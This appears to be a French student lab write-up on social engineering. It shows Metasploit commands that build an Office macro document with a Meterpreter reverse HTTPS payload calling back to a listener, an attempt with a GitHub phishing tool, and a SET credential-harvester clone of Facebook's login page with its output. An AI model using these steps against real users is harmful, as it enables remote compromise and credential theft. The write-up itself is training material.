Aller au contenu

Social engineering

Scenario 1⚓︎

Préparation d'un doccument Office 2013 avec un payload

msfconsole
use exploit/multi/fileformat/office_word_macro 
set payload windows/meterpreter/reverse_https
set host 192.168.10.10
set lport 8000
exploit

Je n'ai pas pu ouvrir le document ni installer Office sur la VM

Scenario 2⚓︎

Phising à l'aide du clonage d'un site sain.

mkdir phisherman
cd phisherman
git clone https://github.com/FDX100/Phisher-man.git
python3 app.py

Une fois l'interface web chargée, on suit les instructions du README:

  • "Clear Apache"
  • "Start Apache Service"

Malhereusement, chaque choix qu'on peut sélectionner nous renvoie une 404 et la page web est redirigée vers un output de logs vide (voir captures ci-après). Il semblerait que la repo ne soit plus mise à jour depuis plus de deux ans.

Scenario 3⚓︎

Phising à l'aide du clonage d'un site sain.

setoolkit
1
2
3
2
https://www.facebook.com
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone: https://www.facebook.com

[*] Cloning the website: https://login.facebook.com/login.php                                                                                                                                                      
[*] This could take a little bit...                                                                                                                                                                                

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.                                                                           
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80                                                                                                                                                                     
[*] Information will be displayed to you as it arrives below:                                                                                                                                                      
[*] Looks like the web_server can't bind to 80. Are you running Apache or NGINX?
Do you want to attempt to disable Apache? [y/n]: y
Stopping apache2 (via systemctl): apache2.service.
Stopping nginx (via systemctl): nginx.service.
[*] Successfully stopped Apache. Starting the credential harvester.
[*] Harvester is ready, have victim browse to your site.

L'attaque ne fonctionne pas, sans doute a cause de l'obsolescence du navigateur de Windows.

192.168.10.30 - - [16/Jun/2024 18:48:40] "GET / HTTP/1.1" 200 -
192.168.10.30 - - [16/Jun/2024 18:48:42] "GET /favicon.ico HTTP/1.1" 404 -

On essaie a nouveau depuis Kali-même:

Ajouter image

La sortie est très verbeuse, avec beaucoup de faux positifs, mais en cherchant on trouve le champs de login :

POSSIBLE USERNAME FIELD FOUND: email=didi@chandouidoui.com 

Malhersuement, le mot de passe reste introuvable, même après avoir lancé une recherche dans le fichier XML exporté.